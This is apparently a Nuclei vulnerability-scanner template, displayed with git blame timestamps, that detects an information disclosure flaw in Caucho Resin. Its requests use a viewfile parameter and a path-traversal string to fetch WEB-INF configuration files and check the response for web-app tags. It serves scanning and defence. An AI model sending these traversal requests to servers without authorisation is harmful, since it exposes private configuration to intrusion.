2021-02-01 17:32:39 +00:00
id : caucho-resin-info-disclosure
2021-02-01 15:43:29 +00:00
info :
2023-03-23 19:46:35 +00:00
name : Caucho Resin - Information Disclosure
2021-02-01 15:43:29 +00:00
author : pikpikcu
severity : info
2023-03-23 19:46:35 +00:00
description : Caucho Resin contains an information disclosure vulnerability. The application does not properly sanitize user-supplied input. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
2022-04-22 10:38:41 +00:00
reference :
- https://www.exploit-db.com/exploits/27888
2023-03-23 19:46:35 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score : 0.0
cwe-id : CWE-200
2022-08-27 04:41:18 +00:00
tags : exposure,resin,caucho,edb
2021-02-01 15:43:29 +00:00
requests :
- method : GET
path :
2021-08-19 17:41:29 +00:00
- "{{BaseURL}}/resin-doc/viewfile/?file=/WEB-INF/resin-web.xml" # Version: 3.0.17/3.0.18
- "{{BaseURL}}/%20../web-inf/web.xml" # Version: 3.1.1
2021-02-01 15:43:29 +00:00
2021-08-19 17:41:29 +00:00
matchers-condition : and
2021-02-01 15:43:29 +00:00
matchers :
- type : word
words :
2021-08-19 17:39:26 +00:00
- "<web-app"
- "</web-app>"
part : body
2021-08-19 17:41:29 +00:00
condition : and
- type : status
status :
- 200
2023-03-23 19:46:35 +00:00
# Enhanced by md on 2023/03/23